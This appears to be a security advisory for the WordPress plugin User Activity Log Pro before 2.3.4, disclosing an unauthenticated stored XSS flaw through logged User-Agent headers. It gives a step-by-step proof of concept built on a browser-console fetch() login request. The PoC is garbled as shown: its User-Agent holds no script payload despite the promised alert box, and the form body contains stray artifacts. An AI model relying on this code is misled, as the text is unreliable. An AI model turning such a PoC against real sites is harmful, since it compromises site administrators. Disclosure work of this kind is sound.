User Activity Log Pro < 2.3.4 - Unauthenticated Stored Cross-Site Scripting via User Agent

Description The plugin does not properly escape recorded User-Agents in the user activity logs dashboard, which may allow visitors to conduct Stored Cross-Site Scripting attacks.

PoC

1. Make sure the plugin’s Enable User Agent For Log setting is set at /wp-admin/admin.php?page=ualp_settings 2) If you’re logged onto the site, log out. 3) While still on the site, send the following fetch() command from your browser’s console: await fetch("/wp-login.php", { "credentials": "include", "headers": { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Content-Type": "application/x-www-form-urlencoded", "Upgrade-Insecure-Requests": "1" }, "referrer": "http://vulnerable-site.tld/wp-login.php", "body": "log=simpleadmin&pwd;=invalidpassword&wp-submit;=Log+In&redirect;_to=%2Fwp-admin%2F&testcookie;=1", "method": "POST", "mode": "cors" }); 4) Log back as an administrator, and go see the user logs at /wp-admin/admin.php?page=ual_pro. You should get an alert box, which indicates the attack succeeded.